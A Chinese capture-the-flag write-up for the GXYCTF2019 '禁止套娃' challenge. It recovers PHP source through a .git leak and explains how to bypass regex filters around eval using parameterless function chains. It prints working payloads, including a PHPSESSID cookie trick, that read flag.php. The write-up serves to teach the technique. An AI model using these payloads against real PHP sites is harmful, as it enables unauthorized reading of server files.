[GXYCTF2019]禁止套娃

参考wp [GXYCTF2019]禁止套娃_pakho_C的博客-CSDN博客_ctf禁止套娃

[GXYCTF2019]禁止套娃--详解_金 帛的博客-CSDN博客_ctf禁止套娃

进入题目环境

 源代码也啥也没有

dirsearch扫网站目录

 git泄露用GitHack下载源文件下来

 得到index.php的源码

include "flag.php";
echo "flag在哪里呢？
";
if(isset($_GET['exp'])){
    if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $_GET['exp'])) {
        if(';' === preg_replace('/[a-z,_]+\((?R)?\)/', NULL, $_GET['exp'])) {
            if (!preg_match('/et|na|info|dec|bin|hex|oct|pi|log/i', $_GET['exp'])) {
                // echo $_GET['exp'];
                @eval($_GET['exp']);
            }
            else{
                die("还差一点哦！");
            }
        }
        else{
            die("再好好想想！");
        }
    }
    else{
        die("还想读flag，臭弟弟！");
    }
}
// highlight_file(__FILE__);
?>

可以看见过滤了data://,fileter://,phar://,php://,和et，na，info，dec，bin，hex，oct，pi，log

中间的if代表匹配字母和下划线和括号比如a(b()),b_bb(c_cc())括号可以有无数个也可以没有

 (?R)是引用当前表达式，(?R)? 这里多一个?表示可以有引用，也可以没有。引用一次正则变成了[a-z,_]+[a−z,]+(?R)?" role="presentation" style="position: relative;">(?R)?$(?R)?$,可以迭代下去

因为我们不能直接读flag.php，所以我们需要去找出flag.php当前的位置

数组中对指针变换的函数

array_reverse ( array $array [, bool $preserve_keys = FALSE ] ) : array
array_reverse() 接受数组 array 作为输入并返回一个单元为相反顺序的新数组。
array_flip() 交换数组的键和值
array_rand() 从数组中随机取出一个或多个单元，不断刷新访问就会不断随机返回
end() - 将数组的内部指针指向最后一个单元
key() - 从关联数组中取得键名
each() - 返回数组中当前的键／值对并将数组指针向前移动一步
prev() - 将数组的内部指针倒回一位
reset() - 将数组的内部指针指向第一个单元
next() - 将数组中的内部指针向前移动一位

法一

print_r用于输出数组

用scandir列出指定目录中的文件和目录，当参数为.时，即列出当前目录的文件

用localeconv() 函数返回一包含本地数字及货币格式信息的数组。返回的第一个就是.

再用current() 函数返回数组中的当前元素的值。或者是pos也可以
每个数组中都有一个内部的指针指向它的"当前"元素，初始指向插入到数组中的第一个元素。

 最后加上scandir

 可以看见flag.php在第三个位置，而我们不能直接读取第三个位置的flag.php

利用数组反转array_reverse()和数组指针移动下一位next让其在第二个位置就能够读取了

 再用show_source查看内容

 或者是highlight_file

 还有readfile,在源代码里可以看见

或者是利用array_rand随机取

?exp=highlight_file(array_rand(array_flip(scandir(current(localeconv())))));

 

法二

session_id可以获取PHPSESSID的值，PHPSESSID允许字母和数字出现
因此我们在请求包中cookie:PHPSESSID=flag.php

使用session之前需要通过session_start()告诉PHP使用session，php默认是不主动使用session的。
session_id()可以获取到当前的session id。
这样可以构造payload:?exp=readfile(session_id(session_start()));
达到任意文件读取的效果：

如下